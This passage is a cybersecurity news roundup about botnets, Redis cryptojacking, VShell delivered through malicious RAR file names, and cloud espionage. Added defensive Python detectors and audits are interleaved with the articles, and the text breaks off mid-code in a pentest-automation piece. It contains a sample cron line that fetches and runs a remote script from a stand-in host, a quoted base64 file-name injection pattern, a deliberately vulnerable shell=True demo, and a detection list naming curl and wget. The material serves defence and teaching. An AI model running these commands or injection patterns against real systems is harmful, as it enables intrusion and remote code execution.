2025-08-24 AI Startup News
GeoServer Exploits, PolarEdge, and Gayfemboy Push Cybercrime Beyond Traditional Botnets
Cybersecurity researchers are calling attention to multiple campaigns that leverage known security vulnerabilities and exposed Redis servers for various malicious activities, including using the compromised devices as IoT botnets, residential proxies, or cryptocurrency mining infrastructure. The first set of attacks entails the exploitation of CVE-2024-36401 (CVSS score: 9.8), a critical remote code execution vulnerability impacting OSGeo GeoServer GeoTools that has been weaponized in cyber attacks since late last year. “Criminals have used the vulnerability to deploy legitimate software development kits (SDKs) or modified apps to gain passive income via network sharing or residential proxies,” Palo Alto Networks Unit 42 researchers Zhibin Zhang, Yiheng An, Chao Lei, and Haozhe Zhang said in a technical report. “This method of generating passive income is particularly stealthy.
It mimics a monetization strategy used by some legitimate app developers who choose SDKs instead of displaying traditional ads. This can be a well-intentioned choice that protects the user experience and improves app retention.” The cybersecurity company said attackers have been probing GeoServer instances exposed to the internet since at least early March 2025, leveraging the access to drop customized executables from adversary-controlled servers. The payloads are distributed via a private instance of a file-sharing server using transfer.sh, as opposed to a conventional HTTP web server. The applications used in the campaign aim to fly under the radar by consuming minimal resources, while stealthily monetizing victims’ internet bandwidth without the need for distributing custom malware.
The binaries, written in Dart, are designed to interact with legitimate passive income services, discreetly using device resources for activities like bandwidth sharing. The arrangement pays everyone except the victim: the developers of the applications receive payments in exchange for integrating the feature, and the cybercriminals profit from unused bandwidth through a seemingly innocuous channel that doesn’t raise any red flags. “Once running, the executable operates covertly in the background, monitoring device resources and illicitly sharing the victim’s bandwidth whenever possible,” Unit 42 said. “This generates passive income for the attacker.” Telemetry data gathered by the company shows that there were over 7,100 publicly exposed GeoServer instances across 99 countries, with China, the United States, Germany, Great Britain, and Singapore taking the top five spots.
“This ongoing campaign showcases a significant evolution in how adversaries monetize compromised systems,” Unit 42 said. “The attackers’ core strategy focuses on stealthy, persistent monetization rather than aggressive resource exploitation. This approach favors long-term, low-profile revenue generation over easily detectable techniques.” The disclosure comes as Censys detailed the infrastructural backbone powering a large-scale IoT botnet called PolarEdge that comprises enterprise-grade firewalls and consumer-oriented devices like routers, IP cameras, and VoIP phones by taking advantage of known security vulnerabilities. Its exact purpose is currently not known, although it’s clear that the botnet isn’t being used for indiscriminate mass scanning.
Initial access obtained through those flaws is then abused to drop a custom TLS backdoor built on Mbed TLS that facilitates encrypted command-and-control, log cleanup, and dynamic infrastructure updates. The backdoor has commonly been observed listening on high, non-standard ports, likely to stay outside the scope of routine network scans and defensive monitoring. PolarEdge exhibits traits that align with an Operational Relay Box (ORB) network, with the attack surface management platform stating there are indications that the campaign started as far back as June 2023, reaching about 40,000 active devices as of this month. More than 70% of the infections are scattered across South Korea, the United States, Hong Kong, Sweden, and Canada.
“ORBs are compromised exit nodes that forward traffic in order to carry out additional compromises or attacks on behalf of threat actors,” security researcher Himaja Motheram said. “What makes ORBs so valuable to attackers is that they don’t need to take over the device’s core function – they can quietly relay traffic in the background while the device continues to operate normally, making detection by the owner or ISP unlikely.” In recent months, vulnerabilities in products from vendors such as DrayTek, TP-Link, Raisecom, and Cisco have been targeted by bad actors to infiltrate the devices and deploy a Mirai botnet variant codenamed gayfemboy, suggesting an expansion of the targeting scope. “The gayfemboy campaign spans multiple countries, including Brazil, Mexico, the United States, Germany, France, Switzerland, Israel, and Vietnam,” Fortinet said. “Its targets also cover a broad range of sectors, such as manufacturing, technology, construction, and media or communications.” Gayfemboy is capable of targeting various system architectures, including ARM, AArch64, MIPS R3000, PowerPC, and Intel 80386.
It incorporates four primary functions:
- Monitor, which tracks threads and processes while incorporating persistence and sandbox evasion techniques
- Watchdog, which attempts to bind to UDP port 47272
- Attacker, which launches DDoS attacks using UDP, TCP, and ICMP protocols, and enables backdoor access by connecting to a remote server to receive commands
- Killer, which terminates itself if it receives the command from the server or detects sandbox manipulation
“While Gayfemboy inherits structural elements from Mirai, it introduces notable modifications that enhance both its complexity and ability to evade detection,” security researcher Vincent Li said. “This evolution reflects the increasing sophistication of modern malware and reinforces the need for proactive, intelligence-driven defense strategies.” The findings also coincide with a cryptojacking campaign undertaken by a threat actor dubbed TA-NATALSTATUS that’s targeting exposed Redis servers to deliver cryptocurrency miners. The attack essentially involves scanning for unauthenticated Redis servers on port 6379, then issuing legitimate CONFIG SET, SET, and SAVE commands so that the database dump lands on disk as a malicious cron job. That job runs a shell script that disables SELinux, performs defense evasion steps, blocks external connections to the Redis port to prevent rival actors from using the same initial access pathway, and terminates competing mining processes (e.g., Kinsing). Also deployed are scripts that install tools like masscan or pnscan and then launch commands like “masscan --shard” to scan the internet for susceptible Redis instances.
The last step involves setting up persistence via an hourly cron job and kicking off the mining process. Cybersecurity firm CloudSEK said the activity is an evolution of an attack campaign disclosed by Trend Micro in April 2020, now with rootkit-like features that hide malicious processes and alter the timestamps of its files to fool forensic analysis. “By renaming system binaries like ps and top to ps.original and replacing them with malicious wrappers, they filter their own malware (httpgd) out of the output. An admin looking for the miner won’t see it using standard tools,” researcher Abhishek Mathew said.
“They rename curl and wget to cd1 and wd1. This is a simple but brilliant method to bypass security products that monitor for malicious downloads specifically initiated by these common tool names.” Found this article interesting? Follow us on Google News, Twitter and LinkedIn to read more exclusive content we post.
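The CONFIG SET / SET / SAVE sequence described above is the same Redis file-write abuse Trend Micro documented in 2020, and it leaves a very recognizable trail in the server's own MONITOR stream. The following detector is an added example, not CloudSEK's or the article's code: it parses lines in the format `redis-cli MONITOR` prints, tracks each client's dump directory and file name, and raises an alert when a client points the dump at a cron or SSH directory and then forces a SAVE. The sample MONITOR lines, the addresses in them and the sensitive-directory list are constructed.

```python
"""Detect Redis 'CONFIG SET dir/dbfilename + SET + SAVE' file-write abuse.

Added example (not from CloudSEK or the article). Input is the line format
redis-cli MONITOR emits:  <ts> [<db> <ip:port>] "CMD" "arg1" "arg2" ...
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

MONITOR_RE = re.compile(r'^(?P<ts>\d+\.\d+) \[(?P<db>\d+) (?P<client>\S+)\] (?P<args>.*)$')
ARG_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')   # one double-quoted, backslash-escaped argument

# Directories where an attacker-controlled dump file becomes code or credentials (assumption).
SENSITIVE_DIRS = ("/var/spool/cron", "/etc/cron.d", "/etc/cron.hourly", "/root/.ssh", "/home/")
# Substrings that mark a SET value as a cron line or SSH key rather than application data.
PAYLOAD_MARKERS = ("curl ", "wget ", "/bin/sh", "| sh", "ssh-rsa ", "ssh-ed25519 ")


@dataclass
class ClientState:
    dump_dir: Optional[str] = None
    dump_file: Optional[str] = None
    payload_keys: List[str] = field(default_factory=list)


def _unescape(arg):
    """Undo MONITOR's escaping so cron payloads contain real newlines."""
    return (arg.replace("\\n", "\n").replace("\\r", "\r")
               .replace('\\"', '"').replace("\\\\", "\\"))


def parse_monitor_line(line):
    """Return (client, [args]) for a MONITOR line, or None for anything else (e.g. 'OK')."""
    m = MONITOR_RE.match(line.strip())
    if not m:
        return None
    return m.group("client"), [_unescape(a) for a in ARG_RE.findall(m.group("args"))]


def detect_rdb_write_abuse(lines):
    """Track per-client state and alert on SAVE/BGSAVE into a sensitive directory."""
    states, alerts = {}, []
    for line in lines:
        parsed = parse_monitor_line(line)
        if not parsed or not parsed[1]:
            continue
        client, args = parsed
        st = states.setdefault(client, ClientState())
        cmd = args[0].upper()
        if cmd == "CONFIG" and len(args) >= 4 and args[1].upper() == "SET":
            key = args[2].lower()
            if key == "dir":
                st.dump_dir = args[3]
            elif key == "dbfilename":
                st.dump_file = args[3]
        elif cmd == "SET" and len(args) >= 3 and any(mk in args[2] for mk in PAYLOAD_MARKERS):
            st.payload_keys.append(args[1])
        elif cmd in ("SAVE", "BGSAVE") and st.dump_dir and st.dump_dir.startswith(SENSITIVE_DIRS):
            alerts.append({
                "client": client,
                "dir": st.dump_dir,
                "file": st.dump_file or "dump.rdb",
                "payload_keys": list(st.payload_keys),
                # A planted cron/SSH payload makes this code execution, not just a stray dump.
                "severity": "high" if st.payload_keys else "medium",
            })
    return alerts


# Constructed sample: one attacker session and one benign admin session.
SAMPLE_MONITOR = r'''
1724490000.101 [0 203.0.113.7:41122] "CONFIG" "SET" "dir" "/var/spool/cron/"
1724490000.102 [0 203.0.113.7:41122] "CONFIG" "SET" "dbfilename" "root"
1724490000.103 [0 203.0.113.7:41122] "SET" "x" "\n\n*/1 * * * * curl -fsSL http://198.51.100.9/x.sh | sh\n\n"
1724490000.104 [0 203.0.113.7:41122] "SAVE"
1724490001.000 [0 10.0.0.5:55010] "CONFIG" "SET" "maxmemory" "256mb"
1724490001.001 [0 10.0.0.5:55010] "SAVE"
'''

if __name__ == "__main__":
    for alert in detect_rdb_write_abuse(SAMPLE_MONITOR.splitlines()):
        print(alert)
```

Feed it live with `redis-cli MONITOR | python3 redis_watch.py` (reading `sys.stdin` instead of the sample). The check only matters on a server that still answers CONFIG without authentication; on any internet-reachable instance the fix is `protected-mode yes`, `bind` to a private address, `requirepass`, and `rename-command CONFIG ""` in redis.conf, which removes the write primitive entirely.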
Linux Malware Delivered via Malicious RAR Filenames Evades Antivirus Detection
Cybersecurity researchers have shed light on a novel attack chain that employs phishing emails to deliver an open-source backdoor called VShell. Trellix researcher Sagar Bade described it in a technical write-up as a “Linux-specific malware infection chain that starts with a spam email with a malicious RAR archive file.” “The payload isn’t hidden inside the file content or a macro, it’s encoded directly in the filename itself. Through clever use of shell command injection and Base64-encoded Bash payloads, the attacker turns a simple file listing operation into an automatic malware execution trigger.” The technique, the cybersecurity company added, takes advantage of a simple yet dangerous pattern commonly seen in shell scripts: file names are evaluated without adequate sanitization, so a trivial command like eval or echo ends up executing arbitrary code.
What’s more, the technique offers the added advantage of getting around traditional defenses, as antivirus engines don’t typically scan file names. The starting point of the attack is an email message containing a RAR archive, which includes a file with a maliciously crafted file name: “ziliao2.pdf{echo,<Base64-encoded command>}|{base64,-d}|bash”
Specifically, the file name incorporates Bash-compatible code that’s engineered to execute commands when it’s interpreted by the shell. It’s worth noting that simply extracting the file from the archive does not trigger execution. Rather, it occurs only when a shell script or command attempts to parse the file name.
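The distinction drawn above, extraction is harmless but parsing the name through a shell is not, is easiest to see side by side. The block below is an added example, not Trellix's code or the campaign's payload: it creates a directory containing a constructed malicious file name, lists it once the way a careless script does (name spliced into a shell command string) and once safely (name passed as an argument vector), and shows a quarantine check an extractor can apply before any script sees the name. The article's real sample relies on bash brace expansion and a base64 pipeline; the constructed name here uses a plain `;` separator and a harmless `echo` so the effect is visible without running anything dangerous.

```python
"""File-name command injection: vulnerable vs. safe handling (added example).

The file name is the attacker's input. Splicing it into a shell string lets the
shell parse it as commands; passing it as an argv element keeps it as data.
"""
import os
import subprocess
import tempfile

# Constructed malicious name (not the campaign's): ';' ends the echo and starts a second command.
EVIL_NAME = "ziliao2.pdf;echo INJECTED"
# Characters the POSIX shell treats specially; '{' '}' also cover the brace-expansion form.
SHELL_METACHARS = set(";|&$`(){}<>\n'\"\\")


def make_sample_dir():
    """Create a scratch directory holding the constructed evil name and a benign file."""
    d = tempfile.mkdtemp()
    for name in (EVIL_NAME, "notes.txt"):
        open(os.path.join(d, name), "w").close()
    return d


def list_files_vulnerable(directory):
    """Mimics 'for f in *; do eval "echo $f"; done': the name is parsed by /bin/sh."""
    out = []
    for name in sorted(os.listdir(directory)):
        r = subprocess.run("echo " + name, shell=True, capture_output=True, text=True)
        out.append(r.stdout)
    return "".join(out)


def list_files_safe(directory):
    """Same listing with an argument vector and no shell: the name is never interpreted."""
    out = []
    for name in sorted(os.listdir(directory)):
        r = subprocess.run(["echo", name], capture_output=True, text=True)
        out.append(r.stdout)
    return "".join(out)


def injected(output):
    """True if the second, injected command ran (a line consisting only of INJECTED)."""
    return "INJECTED" in output.splitlines()


def suspicious_names(directory):
    """Names an archive extractor should quarantine before any shell script touches them."""
    return sorted(n for n in os.listdir(directory) if set(n) & SHELL_METACHARS)


if __name__ == "__main__":
    d = make_sample_dir()
    print("vulnerable listing injected:", injected(list_files_vulnerable(d)))
    print("safe listing injected:     ", injected(list_files_safe(d)))
    print("quarantine:", suspicious_names(d))
```

The same rule applies to shell scripts directly: quote expansions (`"$f"`), never `eval` a string that contains a file name, and treat `find -exec` or `xargs -0` as the replacement for `for f in $(ls)` loops.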
Another important aspect to consider here is that it’s not possible to manually create a file name with this syntax, meaning it was likely created using another language or dropped using an external tool or script that bypasses shell input validation, Trellix said. Once the name is parsed by a shell, the embedded Base64-encoded downloader runs and retrieves from an external server an ELF binary for the appropriate system architecture (x86_64, i386, i686, armv7l, or aarch64). The binary, for its part, contacts a command-and-control (C2) server to obtain the encrypted VShell payload, then decodes and executes it on the host. Trellix said the phishing emails are disguised as an invitation to a beauty product survey, luring recipients with a monetary reward (10 RMB) for completing it.
“Crucially, the email includes a RAR archive attachment (‘yy.rar’), even though it doesn’t explicitly instruct the user to open or extract it,” Bade explained. “The social engineering angle is subtle: The user is distracted by the survey content, and the presence of the attachment might be mistaken for a survey-related document or data file.” VShell is a Go-based remote access tool that has been widely used by Chinese hacking groups in recent years, including UNC5174, supporting reverse shell, file operations, process management, port forwarding, and encrypted C2 communications. What makes this attack dangerous is that the malware operates entirely in memory, avoiding disk-based detection, and it can target a wide range of Linux devices. “This analysis highlights a dangerous evolution in Linux malware delivery where a simple file name embedded in a RAR archive can be weaponized to execute arbitrary commands,” Trellix said.
“The infection chain exploits command injection in shell loops, abuses Linux’s permissive execution environment, and ultimately delivers a powerful backdoor VShell malware capable of full remote control over the system.” The development comes as Picus Security released a technical analysis of a Linux-focused post-exploitation tool dubbed RingReaper that leverages the Linux kernel’s io_uring framework to circumvent traditional monitoring tools. It’s currently not known who is behind the malware. “Instead of invoking standard functions such as read, write, recv, send, or connect, RingReaper employs io_uring primitives (e.g., io_uring_prep_*) to execute equivalent operations asynchronously,” security researcher Sıla Özeren Hacıoğlu said. “This method helps bypass hook-based detection mechanisms and reduces the visibility of malicious activity in telemetry commonly gathered by EDR platforms.” RingReaper makes use of io_uring to enumerate system processes, active pseudo-terminal (PTS) sessions, network connections, and logged-in users, while reducing its footprint and avoiding detection.
It’s also capable of collecting user information from the “/etc/passwd” file, abusing SUID binaries for privilege escalation, and erasing traces of itself after execution. “It exploits the Linux kernel’s modern asynchronous I/O interface, io_uring, to minimize reliance on conventional system calls that security tools frequently monitor or hook,” Picus said.
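Hook-based sensors miss io_uring traffic because the I/O never passes through read/write/connect; the kernel's audit subsystem, however, still records the io_uring_setup/io_uring_enter/io_uring_register syscalls themselves. The block below is an added example, not Picus Security's code or RingReaper's: it builds a per-process syscall profile from auditd SYSCALL records and flags any process that drives I/O through io_uring_enter while issuing none of the conventional read/write/network calls a hook would have seen. The audit lines are constructed, the syscall numbers assume an x86_64 host, and the process names are invented.

```python
"""Flag processes whose I/O goes only through io_uring (added example, not Picus's code).

Reads auditd SYSCALL records and reports processes that issue io_uring_enter but
none of the read/write/connect/send/recv calls a hook-based sensor watches for.
"""
import re
from collections import defaultdict

# x86_64 syscall numbers (assumption: the audited host is x86_64).
SYSCALL_NAMES = {
    0: "read", 1: "write", 42: "connect", 44: "sendto", 45: "recvfrom",
    217: "getdents64", 257: "openat",
    425: "io_uring_setup", 426: "io_uring_enter", 427: "io_uring_register",
}
CONVENTIONAL_IO = {"read", "write", "connect", "sendto", "recvfrom"}

# key=value or key="quoted value" pairs as auditd prints them.
FIELD_RE = re.compile(r'(\w+)=("([^"]*)"|\S+)')


def parse_audit_record(line):
    """Return the fields of a SYSCALL record as a dict, or None for other record types."""
    if "type=SYSCALL" not in line:
        return None
    fields = {}
    for key, raw, quoted in FIELD_RE.findall(line):
        fields[key] = quoted if raw.startswith('"') else raw
    return fields


def profile_processes(lines):
    """Count syscalls by name per (pid, comm)."""
    profiles = defaultdict(lambda: defaultdict(int))
    for line in lines:
        rec = parse_audit_record(line)
        if not rec or "syscall" not in rec or "pid" not in rec:
            continue
        name = SYSCALL_NAMES.get(int(rec["syscall"]), "other")
        profiles[(int(rec["pid"]), rec.get("comm", "?"))][name] += 1
    return profiles


def find_io_uring_only(lines, min_enters=3):
    """Processes with >= min_enters io_uring_enter calls and zero conventional I/O calls."""
    suspects = []
    for (pid, comm), counts in profile_processes(lines).items():
        enters = counts.get("io_uring_enter", 0)
        conventional = sum(counts.get(n, 0) for n in CONVENTIONAL_IO)
        if enters >= min_enters and conventional == 0:
            suspects.append({"pid": pid, "comm": comm, "io_uring_enter": enters})
    return suspects


# Constructed audit records: a hidden tool that only uses io_uring, a service that uses
# io_uring alongside ordinary reads, and a shell doing normal reads.
SAMPLE_AUDIT = """\
type=SYSCALL msg=audit(1724490000.101:1): arch=c000003e syscall=425 success=yes exit=3 pid=4242 comm="rr" exe="/tmp/.rr"
type=SYSCALL msg=audit(1724490000.102:2): arch=c000003e syscall=427 success=yes exit=0 pid=4242 comm="rr" exe="/tmp/.rr"
type=SYSCALL msg=audit(1724490000.103:3): arch=c000003e syscall=426 success=yes exit=1 pid=4242 comm="rr" exe="/tmp/.rr"
type=SYSCALL msg=audit(1724490000.104:4): arch=c000003e syscall=426 success=yes exit=1 pid=4242 comm="rr" exe="/tmp/.rr"
type=SYSCALL msg=audit(1724490000.105:5): arch=c000003e syscall=426 success=yes exit=2 pid=4242 comm="rr" exe="/tmp/.rr"
type=SYSCALL msg=audit(1724490000.106:6): arch=c000003e syscall=426 success=yes exit=1 pid=4242 comm="rr" exe="/tmp/.rr"
type=SYSCALL msg=audit(1724490000.201:7): arch=c000003e syscall=425 success=yes exit=5 pid=1000 comm="db-worker" exe="/opt/db/worker"
type=SYSCALL msg=audit(1724490000.202:8): arch=c000003e syscall=426 success=yes exit=1 pid=1000 comm="db-worker" exe="/opt/db/worker"
type=SYSCALL msg=audit(1724490000.203:9): arch=c000003e syscall=426 success=yes exit=1 pid=1000 comm="db-worker" exe="/opt/db/worker"
type=SYSCALL msg=audit(1724490000.204:10): arch=c000003e syscall=426 success=yes exit=1 pid=1000 comm="db-worker" exe="/opt/db/worker"
type=SYSCALL msg=audit(1724490000.205:11): arch=c000003e syscall=0 success=yes exit=512 pid=1000 comm="db-worker" exe="/opt/db/worker"
type=SYSCALL msg=audit(1724490000.301:12): arch=c000003e syscall=0 success=yes exit=64 pid=1500 comm="bash" exe="/usr/bin/bash"
"""

if __name__ == "__main__":
    for s in find_io_uring_only(SAMPLE_AUDIT.splitlines()):
        print(s)
```

To produce these records the host needs audit rules for the three io_uring syscalls (by name where the audit userspace knows them, otherwise by number 425-427 on x86_64) plus whatever subset of read/write/network calls you are willing to pay for; databases and event loops legitimately use io_uring, so the absence of any conventional I/O, not the presence of io_uring, is the signal.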
Chinese Hackers Murky, Genesis, and Glacial Panda Escalate Cloud and Telecom Espionage
Cybersecurity researchers are calling attention to malicious activity orchestrated by a China-nexus cyber espionage group known as Murky Panda that involves abusing trusted relationships in the cloud to breach enterprise networks. “The adversary has also shown considerable ability to quickly weaponize N-day and zero-day vulnerabilities and frequently achieves initial access to their targets by exploiting internet-facing appliances,” CrowdStrike said in a Thursday report. Murky Panda, also known as Silk Typhoon (formerly Hafnium), is best known for its zero-day exploitation of Microsoft Exchange Server flaws in 2021. Attacks mounted by the hacking group have targeted government, technology, academic, legal, and professional services entities in North America.
Earlier this March, Microsoft detailed the threat actor’s shift in tactics, detailing its targeting of the information technology (IT) supply chain as a means to obtain initial access to corporate networks. It’s assessed that Murky Panda’s operations are driven by intelligence gathering. Like other Chinese hacking groups, Murky Panda has exploited internet-facing appliances to obtain initial access and is believed to have also compromised small office/home office (SOHO) devices that are geolocated in the targeted country as an exit node to hinder detection efforts. Other infection pathways include exploitation of known security flaws in Citrix NetScaler ADC and NetScaler Gateway (CVE-2023-3519) and Commvault (CVE-2025-3928).
The initial access is leveraged to deploy web shells like neo-reGeorg to establish persistence and ultimately drop a custom malware called CloudedHope. A 64-bit ELF binary written in Go, CloudedHope functions as a basic remote access tool (RAT) while employing anti-analysis and operational security (OPSEC) measures, such as modifying timestamps and deleting indicators of its presence in victim environments to fly under the radar. But a notable aspect of Murky Panda’s tradecraft concerns the abuse of trusted relationships between partner organizations and their cloud tenants, exploiting zero-day vulnerabilities to breach software-as-a-service (SaaS) providers’ cloud environments and conduct lateral movement to downstream victims. In at least one instance observed in late 2024, the threat actor is said to have compromised a supplier of a North American entity and used the supplier’s administrative access to the victim entity’s Entra ID tenant to add a temporary backdoor Entra ID account.
“Using this account, the threat actor then backdoored several preexisting Entra ID service principals related to Active Directory management and emails,” CrowdStrike said. “The adversary’s goals appear targeted in nature based on their focus on accessing emails.”
From Murky to Genesis
Another China-linked threat actor that has proven skilful at manipulating cloud services is Genesis Panda, which has been observed using cloud infrastructure for basic exfiltration and targeting cloud service provider (CSP) accounts to expand access and establish fallback persistence mechanisms. Active since at least January 2024, Genesis Panda has been attributed to high-volume operations targeting the financial services, media, telecommunications, and technology sectors across 11 countries. The goal of the attacks is to enable access for future intelligence-collection activity.
The possibility that it acts as an initial access broker stems from the group’s exploitation of a wide range of web-facing vulnerabilities and its limited data exfiltration. “Although Genesis Panda targets a variety of systems, they show consistent interest in compromising cloud-hosted systems to leverage the cloud control plane for lateral movement, persistence, and enumeration,” CrowdStrike said. The adversary has been observed “consistently” querying the Instance Metadata Service (IMDS) of a cloud-hosted server to obtain credentials for the cloud control plane and enumerate network and general instance configurations. It’s also known to use credentials, likely obtained from compromised virtual machines (VMs), to burrow deeper into the target’s cloud account.
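The IMDS step described above only works as a credential source when the instance still honours IMDSv1, where any code running on the box (or any SSRF into it) can GET the role credentials without first obtaining a session token. The following audit is an added example, not CrowdStrike's code or tooling: it walks the response shape that boto3's `describe_instances` returns, flags instances that still allow IMDSv1, rates the ones carrying an instance profile as high because their role credentials are the actual prize, and notes PUT hop limits above 1 that let containers on the host reach the service. The sample response, account ID, instance IDs and role name are constructed; `fetch_and_audit` is a thin live wrapper that needs AWS credentials and is not exercised offline.

```python
"""Audit EC2 instances for IMDSv1 exposure (added example, not CrowdStrike's code).

audit_metadata_options() works on the dict shape boto3 describe_instances returns,
so it can be run offline against a saved response or live through fetch_and_audit().
"""


def audit_metadata_options(response):
    """Return findings for instances where the metadata service still answers IMDSv1."""
    findings = []
    for reservation in response.get("Reservations", []):
        for inst in reservation.get("Instances", []):
            opts = inst.get("MetadataOptions", {})
            if opts.get("HttpEndpoint", "enabled") == "disabled":
                continue  # no metadata service at all: nothing to harvest here
            tokens = opts.get("HttpTokens", "optional")      # AWS default is optional
            hop_limit = int(opts.get("HttpPutResponseHopLimit", 1))
            role_arn = inst.get("IamInstanceProfile", {}).get("Arn")
            if tokens != "required":
                findings.append({
                    "instance": inst["InstanceId"],
                    "issue": "IMDSv1 allowed (HttpTokens=optional)",
                    # Without a role there are no control-plane credentials to steal.
                    "severity": "high" if role_arn else "low",
                    "role": role_arn,
                })
            if hop_limit > 1:
                findings.append({
                    "instance": inst["InstanceId"],
                    "issue": f"PUT hop limit {hop_limit} lets containers on the host reach IMDS",
                    "severity": "medium" if tokens != "required" else "info",
                    "role": role_arn,
                })
    return findings


def fetch_and_audit(region):
    """Live wrapper: paginate describe_instances in one region and audit each page."""
    import boto3  # imported here so the offline audit needs no AWS SDK
    ec2 = boto3.client("ec2", region_name=region)
    findings = []
    for page in ec2.get_paginator("describe_instances").paginate():
        findings.extend(audit_metadata_options(page))
    return findings


# Constructed describe_instances response: one exposed role, one hardened host, one roleless host.
SAMPLE_RESPONSE = {
    "Reservations": [{"Instances": [
        {"InstanceId": "i-0a1b2c3d4e5f60001",
         "IamInstanceProfile": {"Arn": "arn:aws:iam::123456789012:instance-profile/web-role"},
         "MetadataOptions": {"HttpEndpoint": "enabled", "HttpTokens": "optional",
                             "HttpPutResponseHopLimit": 1}},
        {"InstanceId": "i-0a1b2c3d4e5f60002",
         "IamInstanceProfile": {"Arn": "arn:aws:iam::123456789012:instance-profile/ecs-role"},
         "MetadataOptions": {"HttpEndpoint": "enabled", "HttpTokens": "required",
                             "HttpPutResponseHopLimit": 2}},
        {"InstanceId": "i-0a1b2c3d4e5f60003",
         "MetadataOptions": {"HttpEndpoint": "enabled", "HttpTokens": "optional",
                             "HttpPutResponseHopLimit": 1}},
    ]}]
}

if __name__ == "__main__":
    for f in audit_metadata_options(SAMPLE_RESPONSE):
        print(f["severity"].upper(), f["instance"], f["issue"], f.get("role") or "")
```

Remediate with `aws ec2 modify-instance-metadata-options --instance-id <id> --http-tokens required --http-put-response-hop-limit 1`, and pair it with alerting on role credentials being used from an IP that is not the instance they were issued to, since that is what the "burrow deeper" phase above looks like in CloudTrail.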
The findings illustrate how Chinese hacking groups are becoming increasingly adept at breaking into and navigating cloud environments, while also prioritizing stealth and persistence to ensure sustained access and covert data harvesting.
Glacial Panda Strikes Telecom Sector
The telecommunications sector, per CrowdStrike, has witnessed a 130% increase in nation-state activity over the past year, primarily because telecom networks are a treasure trove of intelligence. The latest threat actor to train its sights on the industry vertical is a Chinese threat actor dubbed Glacial Panda. The geographic footprint of the hacking group spans Afghanistan, Hong Kong, India, Japan, Kenya, Malaysia, Mexico, Panama, the Philippines, Taiwan, Thailand, and the United States.
“Glacial Panda highly likely conducts targeted intrusions for intelligence collection purposes, accessing and exfiltrating call detail records and related communications telemetry from multiple telecommunications organizations,” the cybersecurity company said. “The adversary primarily targets Linux systems typical in the telecommunications industry, including legacy operating system distributions that support older telecommunications technologies.” Attack chains implemented by the threat actor make use of known security vulnerabilities or weak passwords aimed at internet-facing and unmanaged servers, with follow-on activities leveraging privilege escalation bugs like CVE-2016-5195 (aka Dirty COW) and CVE-2021-4034 (aka PwnKit). Besides relying on living-off-the-land (LotL) techniques, Glacial Panda’s intrusions pave the way for the deployment of trojanized OpenSSH components, collectively codenamed ShieldSlide, to gather user authentication sessions and credentials. “The ShieldSlide-trojanized SSH server binary also provides backdoor access, authenticating any account (including root) when a hardcoded password is entered,” CrowdStrike said.
Automation Is Redefining Pentest Delivery
Pentesting remains one of the most effective ways to identify real-world security weaknesses before adversaries do. But as the threat landscape has evolved, the way we deliver pentest results hasn’t kept pace. Most organizations still rely on traditional reporting methods—static PDFs, emailed documents, and spreadsheet-based tracking. The problem?
These outdated workflows introduce delays, create inefficiencies, and undermine the value of the work. Security teams need faster insights, tighter handoffs, and clearer paths to remediation. That’s where automated delivery comes in. Platforms like PlexTrac automate pentest finding delivery in real time through robust, rules-based workflows.
(No waiting for the final report!)
The Static Delivery Problem in a Dynamic World
Delivering a pentest report solely as a static document might have made sense a decade ago, but today it’s a bottleneck. Findings are buried in long documents that don’t align with how teams operate day-to-day. After receiving the report, stakeholders must manually extract findings, create tickets in platforms like Jira or ServiceNow, and coordinate remediation tracking through disconnected workflows. By the time remediation begins, days or weeks may have passed since the issues were discovered.
Why Automation Matters Now
As organizations adopt Continuous Threat Exposure Management (CTEM) and expand the frequency of offensive testing, the volume of findings grows rapidly. Without automation, teams struggle to keep up. Automating delivery helps cut through the noise and deliver results in real time for faster handoffs and visibility across the entire vulnerability lifecycle. Benefits of automating pentest delivery include:
- Real-time actionability: Act on findings immediately, not after the report is finalized
- Faster response: Accelerate remediation, retesting and validation
- Standardized operations: Ensure every finding follows a consistent process
- Less manual work: Free teams to focus on strategic initiatives
- Improved focus: Keep teams focused on what matters
Service providers gain a competitive advantage by automating delivery and integrating directly into client workflows, making themselves an indispensable partner in driving client value.
For enterprises, it’s a fast track to operational maturity and a measurable reduction in mean time to remediation (MTTR).
5 Key Components of Automated Pentest Delivery
- Centralized data ingestion: Start by consolidating all findings, manual and automated, into a single source of truth. This includes outputs from scanners (like Tenable, Qualys, Wiz, Snyk) as well as manual pentest findings. Without centralization, vulnerability management becomes a patchwork of disconnected tools and manual processes.
- Automated real-time delivery: As findings are identified, they should be automatically routed to the right people and workflows without waiting for the full report. Predefined rulesets should trigger triage, ticketing, and tracking so that remediation can begin while testing is still in progress.
- Automated routing & ticketing: Standardize routing by defining rules based on severity, asset ownership, and exploitability. Automation can assign findings, generate tickets in tools like Jira or ServiceNow, notify stakeholders through Slack or email, and close out informational issues, so that findings land with the right teams and systems without manual handling.
- Standardized remediation workflows: Every finding from your centralized data should follow the same lifecycle from triage to closure based on the criteria you’ve set, regardless of source. Whether it’s discovered by a scanner or by manual testing, the process from triage to fix should be consistent and traceable.
- Triggered retesting & validation: When a finding is marked as resolved, automation should trigger the appropriate retesting or validation workflow. This ensures nothing slips through the cracks and keeps communication between security and IT teams coordinated and closed-loop.
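The routing, auto-close and retest components above are easier to judge as a small state machine than as prose. The block below is an added example, not PlexTrac's Workflow Automation Engine or its API: it evaluates an ordered rule list against each finding as it arrives (first match wins), opens a ticket or auto-closes informational items, and refuses to close a resolved finding until a retest has passed, reopening it otherwise. The rules, team names, SLA values and sample findings are all constructed.

```python
"""Rules-based routing and closed-loop lifecycle for pentest findings.

Added example, not PlexTrac's engine. Rules, queues, SLAs and findings are constructed.
"""
from dataclasses import dataclass, field
from typing import List, Optional


@dataclass
class Finding:
    id: str
    title: str
    severity: str            # critical | high | medium | low | info
    exploitable: bool        # tester confirmed a working exploit path
    asset_owner: str         # team that owns the affected asset
    source: str              # "manual" or the scanner that produced it
    status: str = "open"     # open | resolved | reopened | closed
    ticket: Optional[dict] = None
    history: List[str] = field(default_factory=list)


# Evaluated top to bottom; the first rule whose predicate matches decides (constructed policy).
RULES = [
    {"name": "auto-close-info", "when": lambda f: f.severity == "info", "action": "close"},
    {"name": "exploitable-high",
     "when": lambda f: f.severity in ("critical", "high") and f.exploitable,
     "action": "ticket", "team": "security-oncall", "priority": "P1", "sla_days": 7},
    {"name": "high", "when": lambda f: f.severity in ("critical", "high"),
     "action": "ticket", "team": None, "priority": "P2", "sla_days": 30},
    {"name": "default", "when": lambda f: True,
     "action": "ticket", "team": None, "priority": "P3", "sla_days": 90},
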